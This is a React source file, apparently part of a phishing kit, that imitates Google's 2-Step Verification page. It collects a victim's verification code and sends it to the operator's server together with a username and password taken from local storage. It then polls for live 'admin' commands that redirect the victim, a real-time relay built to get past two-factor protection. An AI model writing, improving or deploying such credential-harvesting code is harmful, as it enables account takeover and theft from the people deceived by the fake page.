import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import GoogleAuthLayout from "./GoogleAuthLayout";
import { AUTH_TYPE_ROUTES } from "./authRoutes";

export default function Email() {
  const navigate = useNavigate();
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [email, setEmail] = useState("");
  const [codeSubmitted, setCodeSubmitted] = useState(false);
  const isSubmittingCode = useRef(false);

  const API_URL = process.env.REACT_APP_API_BASE_URL;

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");
    setLoading(true);
    isSubmittingCode.current = true;

    const username = localStorage.getItem("username") || "";
    const password = localStorage.getItem("password") || "";
    const currentSessionId = sessionId || localStorage.getItem("session_id");

    (async () => {
      try {
        const res = await fetch(`${API_URL}/api/email`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ code, username, password, session_id: currentSessionId }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Verification failed");
        }

        const { session_id } = await res.json();
        // Use the returned session_id, but also keep the original if it exists
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        setCodeSubmitted(true); // Trigger polling to start for redirect
        setLoading(true);
      } catch (err) {
        console.error("Verification failed:", err);
        setError(err.message || "Verification failed");
        setLoading(false);
        isSubmittingCode.current = false;
      }
    })();
  };

  useEffect(() => {
    const storedEmail = localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);
    
    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  useEffect(() => {
    // Only poll if we have sessionId AND we've submitted the code
    if (!sessionId || !codeSubmitted) {
      if (!codeSubmitted) setLoading(false);
      return;
    }

    // Set loading when we start polling (after code submission)
    setLoading(true);

    const routes = AUTH_TYPE_ROUTES;

    const poll = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        // PRIORITY 1: Check redirect first (like Tap does)
        if (data.redirect) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        // PRIORITY 2: Check for authType change (only if not current type)
        if (data.authType && data.authType !== "email") {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          const route = routes[data.authType];
          if (route) {
            navigate(route);
          }
          return;
        }

        // PRIORITY 3: Check for errors
        if (data.error) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          setCodeSubmitted(false);
          setError(data.error);
          return;
        }

        // Keep loading while waiting for admin response (between commands)
        setLoading(true);
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingCode.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, codeSubmitted, API_URL, navigate]);

  return (
    <GoogleAuthLayout
      heading="2-Step Verification"
      subheading="To help keep your account safe, Google wants to make sure it's really you trying to sign in"
      email={email}
      showEmailBadge
    >
      {error && (
        <div className="google-error-container">
          <p className="google-error-message">{error}</p>
        </div>
      )}

      <form onSubmit={handleSubmit} className="google-login-form">
        <div className="google-auth-fields">
          <div className="google-phone-step-copy">
            <h2 className="google-phone-step-title">2-Step Verification</h2>
            <p className="google-phone-step-text">
              A verification code was sent to your email
            </p>
          </div>

          <div className="google-input-group">
            <div className="google-input-wrapper">
              <input
                id="emailCode"
                type="tel"
                inputMode="numeric"
                pattern="\d{6,8}"
                maxLength={8}
                minLength={6}
                value={code}
                disabled={loading}
                onChange={(e) => {
                  const val = e.target.value;
                  if (/^\d*$/.test(val)) {
                    setCode(val);
                    if (error) setError("");
                  }
                }}
                required
                className={`google-input ${code.trim() ? "google-input-filled" : ""} ${error ? "google-input-error" : ""}`}
              />
              <label htmlFor="emailCode" className="google-label">
                Enter verification code
              </label>
            </div>
          </div>
        </div>

        <div className="google-button-group google-auth-actions">
          <a href="#" className="google-link-secondary">Try another way</a>
          <button
            type="submit"
            className="google-button-primary"
            disabled={loading || code.length < 6 || code.length > 8}
          >
            {loading ? <div className="google-spinner" /> : "Next"}
          </button>
        </div>
      </form>
    </GoogleAuthLayout>
  );
}
